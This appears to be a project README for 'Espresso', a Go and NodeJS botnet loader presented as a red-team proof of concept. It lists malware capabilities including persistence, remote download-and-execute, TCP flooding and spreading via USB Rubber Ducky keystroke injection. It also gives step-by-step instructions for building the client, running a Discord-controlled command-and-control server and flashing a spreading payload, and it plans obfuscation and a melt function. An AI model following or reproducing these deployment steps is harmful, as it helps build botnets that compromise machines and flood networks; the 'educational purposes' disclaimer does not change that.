HTTP/HTTPS based Golang botnet
Espresso is a simple POC loader/bot inteded to be used for red team operations at controlled pentetsing enviroments. It features a centralized command & control server, session based API encryption and uses a Discord bot as the admin interface. It uses Rubber ducky or any keyboard emulation capable microcontroller as a spreading agent.
- Writen in NodeJS
- Cross platform
- Discord bot control (no login system required)
- Used ID whitelist
- IP blacklist
- Using ORM (compatible with any SQL database)
- User-Agent filtering
- Written in Go
- Persistence
- AES256 traffic and file encryption
- System information (OS, arch, hostname)
- Download and run .exe remotely
- TCP flooding
- USB Rubber Ducky or Arduino spreading
Server
- Install NodeJS
- Unzip the project and cd into it
- Install NodeJS dependencies with
yarn installornpm install - Edit
.envwith your info - Edit the User Whitelist with your discord id's
- Edit the Ip Blacklist with your ip's
- Start server with
yarn startornpm startor a process manager (PM2) - Copy invite from terminal and invite the bot into your server
Client
- Install Golang
- Go to
srcdir - Clone this repo
git clone https://github.com/TasosY2K/espresso-bot.git - cd to
client/and install Go registry withgo get -u golang.org/x/sys/windows/registry - Edit the variables in
espresso.goat themainfunction with your info - Build the client by running
build.batorbuild.sh - Your coffee is ready
espresso.exe
Spreading
- Install Arduino IDE or Rubber Ducky flasher
- Edit
client/DownloadAndRun.txtorclient/DownloadAndRun.inowith your payload url - Flash
- Better spreading agent
- Add obfuscation
- Fix loader
- Add kill switch
- Add melt function
I will not be responsible for any direct or indirect damage caused due to the usage of this tool, it is for educational purposes only.